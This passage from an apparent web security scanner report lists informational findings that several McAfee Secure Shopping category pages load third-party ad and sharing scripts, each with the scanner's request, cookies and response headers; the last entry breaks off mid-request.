<title>View Blankets at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.9. http://secureshopping.mcafee.com/browse/baby/apparel/dresses-gowns/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/dresses-gowns/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/dresses-gowns/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:20 GMT
Content-Length: 60378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Dresses & Gowns at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.10. http://secureshopping.mcafee.com/browse/baby/apparel/footwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/footwear/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/footwear/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:20 GMT
Content-Length: 60660

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Footwear at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.11. http://secureshopping.mcafee.com/browse/baby/apparel/hats-caps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/hats-caps/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/hats-caps/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:21 GMT
Content-Length: 51939

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Hats & Caps at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.12. http://secureshopping.mcafee.com/browse/baby/apparel/jackets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jackets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/jackets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:23 GMT
Content-Length: 58511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Jackets at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.13. http://secureshopping.mcafee.com/browse/baby/apparel/jumpsuits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jumpsuits/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/jumpsuits/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:23 GMT
Content-Length: 61118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Jumpsuits at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.14. http://secureshopping.mcafee.com/browse/baby/apparel/layette/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/layette/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/layette/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:25 GMT
Content-Length: 67080

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Layette at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.15. http://secureshopping.mcafee.com/browse/baby/apparel/leggings-tights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/leggings-tights/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/leggings-tights/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:25 GMT
Content-Length: 57648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Leggings & Tights at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.16. http://secureshopping.mcafee.com/browse/baby/apparel/pajamas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pajamas/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/pajamas/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:26 GMT
Content-Length: 61950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Pajamas at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.17. http://secureshopping.mcafee.com/browse/baby/apparel/pants/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pants/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/pants/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:29 GMT
Content-Length: 57625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Pants at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.18. http://secureshopping.mcafee.com/browse/baby/apparel/shirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/shirts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/shirts/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
